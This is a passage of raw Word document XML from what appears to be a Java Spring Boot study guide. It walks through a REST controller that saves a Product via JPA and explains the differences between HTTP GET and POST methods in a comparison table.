          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4AD28A"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Product saveProduct(Product product) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347BD92A"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productRepository.save(product);  // Saves to DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4702B8"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553FF3E1"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117BF0EF" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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4. Product Controller (REST API Endpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD6AD68"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C74B8A"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http.HttpStatus;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A9E865"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web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61451686" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="327DF67C"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2565CACA"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questMapping("/api/products")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2175C2"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ProductController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AF6D2B" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFBCE5B"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A285AB1"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ProductService productService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392C05C7" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E67616"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ostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4D1F2D"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sponseStatus(HttpStatus.CREATED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B204D8"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Product createProduct(@RequestBody Product product) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7970CA47"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productService.saveProduct(product);  // Persist data in DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770CF0A3"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46789E51"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1C5E6212" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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 Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE4FB71"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Client Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F1303" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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HTTP POST request: POST /api/products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD948C2" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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quest Body:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C91F2E" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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15BE0659" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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name": "Laptop",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3606479E" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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ce": 999.99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F65696" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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6A647854"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Spring Boot Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B69256E"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 ProductController handles the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCDAA8C"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lastRenderedPageBreak/>
        <w:t>The @RequestBody annotation converts the JSON request body into a Product object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14C8E7"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 ProductService calls the productRepository.save() method to persist the product in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646C0C20"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 Product entity is persisted into the corresponding product table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201A0909"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 controller returns the saved Product along with a 201 Created status code to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D956D8" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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Database Operations with Spring Data JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E55544"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save()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Saves a new entity or updates an existing entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E04DF67"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findById()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retrieves an entity by its ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB5A1E"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findAll()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retrieves all entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BD19B8"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deleteById()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Deletes an entity by its ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1590AC8B"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findBy...</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can define custom query methods in the repository using Spring Data JPA's derived query method naming convention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A381E58" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F10B9C" w14:textId="77777777" w:rsidR="00DF5D7D" w:rsidRPr="00D774B4" w:rsidRDefault="00DF5D7D"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n summary, when a client sends data to a REST API, the controller receives and maps the request data to a Java object, then the service layer processes the data and calls the repository to persist it in the database using JPA. The response is sent back to the client after the data is successfully stored. This flow ensures that data is efficiently persisted in the database while adhering to the principles of REST architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DB3A5E" w14:textId="514DEBE0"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FA6E938">
          <v:rect id="_x0000_i2591" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B354A5" w14:textId="3BFD4842" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00681982">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="602" w:name="_Toc196308082"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain GET and POST methods</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="602"/>
    </w:p>
    <w:p w14:paraId="7CD6355D" w14:textId="696B9975" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B8" w:rsidP="00D774B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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GET Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CA3077"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The GET method is used to retrieve data from the server. It is the most commonly used HTTP method for fetching resources or data from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B20C7D"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Idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: GET requests are </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning that making multiple identical requests will always return the same result without any side effects. It does not modify any resources on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7495E748"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Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: GET requests can be cached, meaning that repeated requests for the same resource might return the cached response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D6A720"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Data in URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The data in a GET request is usually passed as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>query parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the URL (e.g., ?key1=value1&amp;key2=value2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D634BF"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Visibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Because the data is in the URL, it is visible to anyone who has access to the URL, making it unsuitable for sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B226C0"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Limits</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: There is a size limitation for the data in the URL (depending on the browser or server). Typically, the URL length can be around 2000 characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678589C3"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Examples</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0902DAE8" w14:textId="77777777" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B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Fetching a list of products: GET /api/products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D949A52" w14:textId="77777777" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B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Fetching a specific product by ID: GET /api/products/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F123CA" w14:textId="77777777" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B8"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POST Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F6DAB8"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The POST method is used to send data to the server to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>create</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> new resources or perform operations that might have side effects. Unlike GET, it is used to send data to the server for processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A31929E"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Non-Idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: POST requests are </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning that multiple identical requests can result in different outcomes (e.g., creating multiple instances of a resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD2A611"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Data in Body</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The data is sent in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the request, rather than in the URL. This makes it suitable for sending larger amounts of data or more complex data structures (e.g., JSON or XML).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E39BEE1"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Visibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since the data is in the body, it is not visible in the URL and thus can be used for sending sensitive information, like login credentials or payment details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485C9C5F"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No Size Limits</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The data in a POST request is not limited by URL length, so you can send larger data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E7D22A"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Examples</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F764D15" w14:textId="77777777" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B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reating a new product: POST /api/products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4877DE78" w14:textId="77777777" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B8"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ubmitting a form: POST /api/formSubmit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E7224" w14:textId="77777777" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B8"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Summary of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6"/>
        <w:gridCol w:w="4765"/>
        <w:gridCol w:w="3605"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="45D86B90" w14:textId="77777777" w:rsidTr="008105B8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E8DB309" w14:textId="77777777" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B8"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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D1A1F95" w14:textId="77777777" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B8"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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E3A83A1" w14:textId="77777777" w:rsidR="008105B8" w:rsidRPr="00D774B4" w:rsidRDefault="008105B8"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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="7073BE4D" w14:textId="77777777" w:rsidTr="008105B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AA3565F"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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="073532F0"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trieve data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EEFCC0D"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ubmit data to be processed or created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="2DB973EE" w14:textId="77777777" w:rsidTr="008105B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="235876ED"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Idempotent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13D72BC1"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40B653CB"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No (non-idempotent)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="06B8C153" w14:textId="77777777" w:rsidTr="008105B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EA13B7E"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Data Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A7415EF"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assed in the URL as query parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="627A3E66"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ent in the request body</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="60FF76D1" w14:textId="77777777" w:rsidTr="008105B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78DD40B3"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Caching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B081208"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an be cached</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FA8923F"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Usually not cached</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="37FE1971" w14:textId="77777777" w:rsidTr="008105B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="437E1A66"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Size Limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
